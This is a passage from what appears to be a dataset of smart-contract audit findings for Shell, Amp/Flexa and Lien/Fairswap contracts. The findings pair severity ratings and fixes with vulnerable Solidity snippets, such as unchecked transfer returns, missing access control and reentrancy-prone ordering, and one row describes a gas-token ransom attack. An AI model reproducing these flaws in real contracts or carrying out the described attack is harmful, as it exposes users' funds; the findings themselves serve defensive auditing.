uint256);\\n```\\n\\n```\\nshell.testHalts = true;\\n```\\n\\n```\\nfunction setTestHalts (bool \\_testOrNotToTest) public {\\n\\n shell.testHalts = \\_testOrNotToTest;\\n\\n}\\n```\\n\\n```\\nbool testHalts;\\n```\\n",Remove the debug functionality at the end of the development cycle of each functionality.,,"```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n" +Remove commented out code from the repository,medium,"Having commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThere is no code that is important enough to be left commented out in a repository. Git branching should take care of having different code versions or diffs should show what was before.\\nIf there is commented out code, this also has to be maintained; it will be out of date if other parts of the system are changed, and the tests will not pick that up.\\nThe main problem is that commented code adds confusion with no real benefit. Code should be code, and comments should be comments.\\nCommented out code should be removed or dealt with in a separate branch that is later included in the master branch.\\n```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\n```\\nfunction transfer (address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return shell.transfer(\\_recipient, \\_amount);\\n}\\n\\nfunction transferFrom (address \\_sender, address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return shell.transferFrom(\\_sender, \\_recipient, \\_amount);\\n}\\n\\nfunction approve (address \\_spender, uint256 \\_amount) public nonReentrant returns (bool success\\_) {\\n // return shell.approve(\\_spender, \\_amount);\\n}\\n\\nfunction increaseAllowance(address \\_spender, uint256 \\_addedValue) public returns (bool success\\_) {\\n // return shell.increaseAllowance(\\_spender, \\_addedValue);\\n}\\n\\nfunction decreaseAllowance(address \\_spender, uint256 \\_subtractedValue) public returns (bool success\\_) {\\n // return shell.decreaseAllowance(\\_spender, \\_subtractedValue);\\n}\\n\\nfunction balanceOf (address \\_account) public view returns (uint256) {\\n // return shell.balances[\\_account];\\n}\\n```\\n\\n```\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_NO\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n```\\n\\n```\\n// function noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public returns (uint256 shellsMinted\\_) {\\n\\n// uint256 startingShells = l.proportionalDeposit(300e18);\\n\\n// uint256 gas = gasleft();\\n\\n// shellsMinted\\_ = l.depositHack(\\n// address(dai), 10e18,\\n// address(usdc), 10e6,\\n// address(usdt), 10e6,\\n// address(susd), 2.5e18\\n// );\\n\\n// emit log\\_uint(""gas for deposit"", gas - gasleft());\\n\\n\\n// }\\n```\\n",Remove all the commented out code or transform it into comments.,,"```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n" +Should check if the asset already exists when adding a new asset,medium,"The public function `includeAsset`\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nCalls the internal `includeAsset` implementation\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n```\\n\\nBut there is no check to see if the asset already exists in the list. Because the check was not done, `shell.numeraires` can contain multiple identical instances.\\n```\\nshell.numeraires.push(\\_numeraireAssimilator);\\n```\\n",Check if the `_numeraire` already exists before invoking `includeAsset`.,,"```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n" +Check return values for both internal and external calls,low,"There are some cases where functions which return values are called throughout the source code but the return values are not processed, nor checked.\\nThe returns should in principle be handled and checked for validity to provide more robustness to the code.\\nThe function `intakeNumeraire` receives a number of tokens and returns how many tokens were transferred to the contract.\\n```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n\\nSimilarly, the function `outputNumeraire` receives a destination address and an amount of token for withdrawal and returns a number of transferred tokens to the specified address.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\n\\nHowever, the results are not handled in the main contract.\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\n```\\n\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_oBals[i].mul(\\_multiplier));\\n```\\n\\n```\\nshell.reserves[i].addr.outputNumeraire(msg.sender, \\_oBals[i].mul(\\_multiplier));\\n```\\n\\nA sanity check can be done to make sure that more than 0 tokens were transferred to the contract.\\n```\\nunit intakeAmount = shell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\nrequire(intakeAmount > 0, ""Must intake a positive number of tokens"");\\n```\\n","Handle all return values everywhere returns exist and add checks to make sure an expected value was returned.\\nIf the return values are never used, consider not returning them at all.",,"```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n" +Interfaces do not need to be implemented for the compiler to access their selectors.,low,```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n\\nThis pattern is unneeded since you can reference selectors by using the imported interface directly without any implementation. It hinders both gas costs and readability of the code.,"```\\nbytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n```\\n\\nuse the expression:\\n`IAssimilator.viewRawAmount.selector`",,```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n +Use consistent interfaces for functions in the same group,low,"This library has 2 functions.\\n`add` which receives 2 arguments, `x` and `y`.\\n```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, ""add-overflow"");\\n}\\n```\\n\\n`sub` which receives 3 arguments `x`, `y` and `_errorMessage`.\\n```\\nfunction sub(uint x, uint y, string memory \\_errorMessage) internal pure returns (uint z) {\\n require((z = x - y) <= x, \\_errorMessage);\\n}\\n```\\n\\nIn order to reduce the cognitive load on the auditors and developers alike, somehow-related functions should have coherent logic and interfaces. Both of the functions either need to have 2 arguments, with an implied error message passed to `require`, or both functions need to have 3 arguments, with an error message that can be specified.",Update the functions to be coherent with other related functions.,,"```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, ""add-overflow"");\\n}\\n```\\n" +Consider emitting an event when changing the frozen state of the contract,low,The function `freeze` allows the owner to `freeze` and unfreeze the contract.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n\\nThe common pattern when doing actions important for the outside of the blockchain is to emit an event when the action is successful.\\nIt's probably a good idea to emit an event stating the contract was frozen or unfrozen.,Create an event that displays the current state of the contract.\\n```\\nevent Frozen(bool frozen);\\n```\\n\\nAnd emit the event when `frozen` is called.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n emit Frozen(\\_freeze);\\n}\\n```\\n,,```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n +Function supportsInterface can be restricted to pure,low,"The function `supportsInterface` returns a `bool` stating that the contract supports one of the defined interfaces.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n\\nThe function does not access or change the state of the contract, this is why it can be restricted to `pure`.",Restrict the function definition to `pure`.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public pure returns (bool) {\\n```\\n,,```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n +Use more consistent function naming (includeAssimilator / excludeAdapter),low,"The function `includeAssimilator` adds a new assimilator to the list\\n```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n\\nThe function `excludeAdapter` removes the specified assimilator from the list\\n```\\ndelete shell.assimilators[\\_assimilator];\\n```\\n",Consider renaming the function `excludeAdapter` to `removeAssimilator` and moving the logic of adding and removing in the same source file.,,"```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n" +Eliminate assembly code by using ABI decode,high,"There are several locations where assembly code is used to access and decode byte arrays (including uses inside loops). Even though assembly code was used for gas optimization, it reduces the readability (and future updatability) of the code.\\n```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nassembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n","As discussed in the mid-audit meeting, it is a good solution to use ABI decode since all uses of assembly simply access 32-byte chunks of data from user input. This should eliminate all assembly code and make the code significantly more clean. In addition, it might allow for more compact encoding in some cases (for instance, by eliminating or reducing the size of the flags).\\nThis suggestion can be also applied to Merkle Root verifications/calculation code, which can reduce the for loops and complexity of these functions.",,"```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n" +Ignored return value for transferFrom call,high,"When burning swap tokens the return value of the `transferFrom` call is ignored. Depending on the token's implementation this could allow an attacker to mint an arbitrary amount of Amp tokens.\\nNote that the severity of this issue could have been Critical if Flexa token was any arbitrarily tokens. We quickly verified that Flexa token implementation would revert if the amount exceeds the allowance, however it might not be the case for other token implementations.\\n```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\n","The code should be changed like this:\\n```\\nrequire(swapToken.transferFrom(_from, swapTokenGraveyard, amount));\\n```\\n",,"```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\n" +Potentially insufficient validation for operator transfers,medium,"For operator transfers, the current validation does not require the sender to be an operator (as long as the transferred value does not exceed the allowance):\\n```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n\\nIt is unclear if this is the intention `or` whether the logical `or` should be a logical `and`.","Resolution\\nremoving `operatorTransferByPartition` and simplifying the interfaces to only `tranferByPartition`\\nThis removes the existing tranferByPartition, converting operatorTransferByPartition to it. The reason for this is to make the client interface simpler, where there is one method to transfer by partition, and that method can be called by either a sender wanting to transfer from their own address, or an operator wanting to transfer from a different token holder address. We found that it was redundant to have multiple methods, and the client convenience wasn't worth the confusion.\\nConfirm that the code matches the intention. If so, consider documenting the behavior (for instance, by changing the name of function `operatorTransferByPartition`.",,"```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n" +Potentially missing nonce check Acknowledged,medium,When executing withdrawals in the collateral manager the per-address withdrawal nonce is simply updated without checking that the new nonce is one greater than the previous one (see Examples). It seems like without such a check it might be easy to make mistakes and causing issues with ordering of withdrawals.\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = maxWithdrawalRootNonce;\\n```\\n\\n```\\nmaxWithdrawalRootNonce = \\_nonce;\\n```\\n,Consider adding more validation and sanity checks for nonces on per-address withdrawals.,,```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n +Unbounded loop when validating Merkle proofs,medium,"It seems like the loop for validating Merkle proofs is unbounded. If possible it would be good to have an upper bound to prevent DoS-like attacks. It seems like the depth of the tree, and thus, the length of the proof could be bounded.\\nThis could also simplify the decoding and make it more robust. For instance, in `_decodeWithdrawalOperatorData` it is unclear what happens if the data length is not a multiple of 32. It seems like it might result in out-of-bound reads.\\n```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n","Consider enforcing a bound on the length of Merkle proofs.\\nAlso note that if similar mitigation method as issue 5.1 is used, this method can be replaced by a simpler function using ABI Decode, which does not have any unbounded issues as the sizes of the hashes are fixed (or can be indicated in the passed objects)",,"```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n" +Mitigation for possible reentrancy in token transfers,medium,"ERC777 adds significant features to the token implementation, however there are some known risks associated with this token, such as possible reentrancy attack vector. Given that the Amp token uses hooks to communicate to Collateral manager, it seems that the environment is trusted and safe. However, a minor modification to the implementation can result in safer implementation of the token transfer.\\n```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\n","It is suggested to move any condition check that is checking the balance to after the external call. However `_callPostTransferHooks` needs to be called after the state changes, so the suggested mitigation here is to move the require at line 1152 to after `_callPreTransferHooks()` function (e.g. line 1171).",,"```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\n" +Potentially inconsistent input validation,medium,"There are some functions that might require additional input validation (similar to other functions):\\nAmp.transferWithData: `require(_isOperator(msg.sender, _from), EC_58_INVALID_OPERATOR);` like in\\n```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n\\nAmp.authorizeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\n\\nAmp.revokeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\n",Consider adding additional input validation.,,"```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n" +ERC20 compatibility of Amp token using defaultPartition,medium,"It is somewhat unclear how the Amp token ensures ERC20 compatibility. While the `default` partition is used in some places (for instance, in function balanceOf) there are also separate fields for (aggregated) balances/allowances. This seems to introduce some redundancy and raises certain questions about when which fields are relevant.\\n`_allowed` is used in function `allowance` instead of `_allowedByPartition` with the default partition\\nAn `Approval` event should be emitted when approving the default partition\\n```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n\\n`increaseAllowance()` vs. `increaseAllowanceByPartition()`","After the mid-audit discussion, it was clear that the general `balanceOf` method (with no partition) is not needed and can be replaced with a `balanceOf` function that returns balance of the default partition, similarly for allowance, the general `increaseAllowance` function can simply call `increaseAllowanceByPartition` using default partition (same for decreaseAllowance).",,"```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n" +Additional validation for canReceive,low,"For `FlexaCollateralManager.tokensReceived` there is validation to ensure that only the Amp calls the function. In contrast, there is no such validation for `canReceive` and it is unclear if this is the intention.\\n```\\nrequire(msg.sender == amp, ""Invalid sender"");\\n```\\n","Consider adding a conjunct `msg.sender == amp` in function `_canReceive`.\\n```\\nfunction \\_canReceive(address \\_to, bytes32 \\_destinationPartition) internal view returns (bool) {\\n return \\_to == address(this) && partitions[\\_destinationPartition];\\n}\\n```\\n",,"```\\nrequire(msg.sender == amp, ""Invalid sender"");\\n```\\n" +Discrepancy between code and comments,low,"There are some discrepancies between (uncommented) code and the documentations comment:\\n```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Indicates a supply refund was executed\\n \\* @param supplier Address whose refund authorization was executed\\n \\* @param partition Partition from which the tokens were transferred\\n \\* @param amount Amount of tokens transferred\\n \\*/\\nevent SupplyRefund(\\n address indexed supplier,\\n bytes32 indexed partition,\\n uint256 amount,\\n uint256 indexed nonce\\n);\\n```\\n",Consider updating either the code or the comment.,,"```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n" +Several fields could potentially be private Acknowledged,low,Several fields in `Amp` could possibly be private:\\nswapToken:\\n```\\nISwapToken public swapToken;\\n```\\n\\nswapTokenGraveyard:\\n```\\naddress public constant swapTokenGraveyard = 0x000000000000000000000000000000000000dEaD;\\n```\\n\\ncollateralManagers:\\n```\\naddress[] public collateralManagers;\\n```\\n\\npartitionStrategies:\\n```\\nbytes4[] public partitionStrategies;\\n```\\n\\nThe same hold for several fields in `FlexaCollateralManager`. For instance:\\npartitions:\\n```\\nmapping(bytes32 => bool) public partitions;\\n```\\n\\nnonceToSupply:\\n```\\nmapping(uint256 => Supply) public nonceToSupply;\\n```\\n\\nwithdrawalRootToNonce:\\n```\\nmapping(bytes32 => uint256) public withdrawalRootToNonce;\\n```\\n,Double-check that you really want to expose those fields.,,```\\nISwapToken public swapToken;\\n```\\n +Several fields could be declared immutable Acknowledged,low,Several fields could be declared immutable to make clear that they never change after construction:\\nAmp._name:\\n```\\nstring internal \\_name;\\n```\\n\\nAmp._symbol:\\n```\\nstring internal \\_symbol;\\n```\\n\\nAmp.swapToken:\\n```\\nISwapToken public swapToken;\\n```\\n\\nFlexaCollateralManager.amp:\\n```\\naddress public amp;\\n```\\n,Use the `immutable` annotation in Solidity (see Immutable).,,```\\nstring internal \\_name;\\n```\\n +A reverting fallback function will lock up all payouts,high,"```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n (bool success, ) = \\_recipient.call{value: \\_amount}(\\n abi.encodeWithSignature("""")\\n );\\n require(success, ""Transfer Failed"");\\n}\\n```\\n\\nThe `_payment()` function processes a list of transfers to settle the transactions in an `ExchangeBox`. If any of the recipients of an Eth transfer is a smart contract that reverts, then the entire payout will fail and will be unrecoverable.",Implement a queuing mechanism to allow buyers/sellers to initiate the withdrawal on their own using a ‘pull-over-push pattern.'\\nIgnore a failed transfer and leave the responsibility up to users to receive them properly.,,"```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n (bool success, ) = \\_recipient.call{value: \\_amount}(\\n abi.encodeWithSignature("""")\\n );\\n require(success, ""Transfer Failed"");\\n}\\n```\\n" +Force traders to mint gas token,high,"Attack scenario:\\nAlice makes a large trade via the Fairswap_iDOLvsEth exchange. This will tie up her iDOL until the box is executed.\\nMallory makes a small trades to buy ETH immediately afterwards, the trades are routed through an attack contract.\\nAlice needs to execute the box to get her iDOL out.\\nBecause the gas amount is unlimited, when you Mallory's ETH is paid out to her attack contract, mint a lot of GasToken.\\nIf Alice has $100 worth of ETH tied up in the exchange, you can basically ransom her for $99 of gas token or else she'll never see her funds again.\\n```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\n","When sending ETH, a pull-payment model is generally preferable.\\nThis would require setting up a queue, allowing users to call a function to initiate a withdrawal.",,"```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\n" +Missing Proper Access Control,high,"Some functions do not have proper access control and are `public`, meaning that anyone can call them. This will result in system take over depending on how critical those functionalities are.\\n```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), ""IDOL contract is already registered"");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\n","Make the `setIDOLContract()` function `internal` and call it from the constructor, or only allow the `deployer` to set the value.",,"```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), ""IDOL contract is already registered"");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\n" +Code is not production-ready,high,"Similar to other discussed issues, several areas of the code suggest that the system is not production-ready. This results in narrow test scenarios that do not cover production code flow.\\nisNotStartedAuction\\ninAcceptingBidsPeriod\\ninRevealingValuationPeriod\\ninReceivingBidsPeriod\\n```\\n/\\*\\n// Indicates any auction has never held for a specified BondID\\nfunction isNotStartedAuction(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n return closingTime == 0;\\n}\\n\\n// Indicates if the auctionID is in bid acceptance status\\nfunction inAcceptingBidsPeriod(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n```\\n\\n```\\n// TEST\\nfunction isNotStartedAuction(bytes32 auctionID)\\n public\\n virtual\\n override\\n returns (bool)\\n{\\n return true;\\n}\\n\\n// TEST\\nfunction inAcceptingBidsPeriod(bytes32 auctionID)\\n```\\n\\nThese commented-out functions contain essential functionality for the Auction contract. For example, `inRevealingValuationPeriod` is used to allow revealing of the bid price publicly:\\n```\\nrequire(\\n inRevealingValuationPeriod(auctionID),\\n ""it is not the time to reveal the value of bids""\\n);\\n```\\n",Remove the test functions and use the production code for testing. The tests must have full coverage of the production code to be considered complete.,,```\\n/\\*\\n// Indicates any auction has never held for a specified BondID\\nfunction isNotStartedAuction(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n return closingTime == 0;\\n}\\n\\n// Indicates if the auctionID is in bid acceptance status\\nfunction inAcceptingBidsPeriod(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n```\\n +Unreachable code due to checked conditions,medium,"```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n ""it is not the time to reveal the value of bids""\\n );\\n```\\n\\nHowever, later in the same function, code exists to introduce “Penalties for revealing too early.” This checks to see if the function was called before closing, which should not be possible given the previous check.\\n```\\n/\\*\\*\\n \\* @dev Penalties for revealing too early.\\n \\* Some participants may not follow the rule and publicate their bid information before the reveal process.\\n \\* In such a case, the bid price is overwritten by the bid with the strike price (slightly unfavored price).\\n \\*/\\nuint256 bidPrice = price;\\n\\n/\\*\\*\\n \\* @dev FOR TEST CODE RUNNING: The following if statement in L533 should be replaced by the comment out\\n \\*/\\nif (inAcceptingBidsPeriod(auctionID)) {\\n // if (false) {\\n (, , uint256 solidStrikePriceE4, ) = \\_getBondFromAuctionID(auctionID);\\n bidPrice = \\_exchangeSBT2IDOL(solidStrikePriceE4.mul(10\\*\\*18));\\n}\\n```\\n","Resolution\\nComment from Lien Protocol:\\nDouble-check the logic in these functions. If revealing should be allowed (but penalized in the earlier stage), the first check should be changed. However, based on our understanding, the first check is correct, and the second check for early reveal is redundant and should be removed.",,"```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n ""it is not the time to reveal the value of bids""\\n );\\n```\\n" +Fairswap: inconsistent checks on _executionOrder(),low,"The `_executionOrder()` function should only be called under specific conditions. However, these conditions are not always consistently defined.\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber >= nextExecuteBoxNumber) {\\n```\\n","Resolution\\nComment from Lien Protocol:\\nReduce duplicate code by defining an internal function to perform this check. A clear, descriptive name will help to clarify the intention.",,```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n +Inconsistency in DecimalSafeMath implementations,low,"There are two different implementations of `DecimalSafeMath` in the 3 FairSwap repositories.\\n```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n\\n```\\nlibrary DecimalSafeMath {\\n\\n function decimalDiv(uint256 a, uint256 b)internal pure returns 